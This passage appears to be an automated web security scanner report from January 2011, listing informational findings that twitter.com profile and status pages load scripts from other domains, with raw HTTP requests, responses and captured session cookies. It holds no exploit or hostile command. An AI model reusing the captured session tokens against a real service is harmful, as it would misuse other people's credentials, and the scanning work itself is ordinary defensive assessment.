Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.531. http://twitter.com/rickrussie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rickrussie

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-95753-62367
ETag: "8ac086fffec8d5f0dbc55eb3e67e6a96"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.00915
Content-Type: text/html; charset=utf-8
Content-Length: 51643
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.532. http://twitter.com/rickrussie/status/28548182396903424 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rickrussie/status/28548182396903424

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225142-40728-53822
ETag: "1cbee3680225988db4b7f069eac2d8f6"
Last-Modified: Fri, 28 Jan 2011 14:32:22 GMT
X-Runtime: 0.05601
Content-Type: text/html; charset=utf-8
Content-Length: 13808
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTYyYzZiODVk%250AOTgyYmYyMGU3MTNiNWFlMjc0ZWQzNDdhOgdpZCIlMWM5NTM0ODFhNDJmZGU5%250AYzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgz%250ATvDMLQE%253D--0a45b7902a1463fb664e60dc6835e5ac94eadf04; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.533. http://twitter.com/rickrussie/status/28548182396903424 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/rickrussie/status/28548182396903424

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-32961-2577
ETag: "d46b26b9fe929840b674f147c0c89142"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.33011
Content-Type: text/html; charset=utf-8
Content-Length: 13807
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTExNDc5ZjQ5%250AMmU2NjM5OTY2ODQ3NTY5ZjUxYWFlNjlmOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--3d3bd2cab72fb51e93b5fed240300828d4f6844c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.534. http://twitter.com/roctimo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/roctimo

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224951-66281-31354
ETag: "9b0bbae04a168790126e11b0e79fd723"
Last-Modified: Fri, 28 Jan 2011 14:29:11 GMT
X-Runtime: 0.01993
Content-Type: text/html; charset=utf-8
Content-Length: 39421
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.535. http://twitter.com/roctimo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/roctimo

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234582-62209-33110
ETag: "f9e22213823343f424bfc3ffbab40151"
Last-Modified: Fri, 28 Jan 2011 17:09:42 GMT
X-Runtime: 0.00906
Content-Type: text/html; charset=utf-8
Content-Length: 39288
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.536. http://twitter.com/roctimo/status/29669358812790784 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/roctimo/status/29669358812790784

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /roctimo/status/29669358812790784 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224952-82366-17089
ETag: "352d65a2c5752e7711f2873e5d5683dc"
Last-Modified: Fri, 28 Jan 2011 14:29:12 GMT
X-Runtime: 0.06219
Content-Type: text/html; charset=utf-8
Content-Length: 13608
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6DGNzcmZfaWQiJWRhM2Y2NDUyMWY4%250AOWYxMzc2YjkzMTBhNGFhODkyOTBlOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--160e3ed7351db2a00b10df68a0ea6d7aa90fed75; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.537. http://twitter.com/roctimo/status/29669358812790784 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/roctimo/status/29669358812790784

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /roctimo/status/29669358812790784 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234586-65298-63351
ETag: "97120b0bbdca9f22be00678be4ac6985"
Last-Modified: Fri, 28 Jan 2011 17:09:46 GMT
X-Runtime: 0.04874
Content-Type: text/html; charset=utf-8
Content-Length: 13477
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6FWluX25ld191c2VyX2Zsb3cwOgxj%250Ac3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoMdHpf%250AbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--21b275406cd16839582a6a682f9edca9368c5a9d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
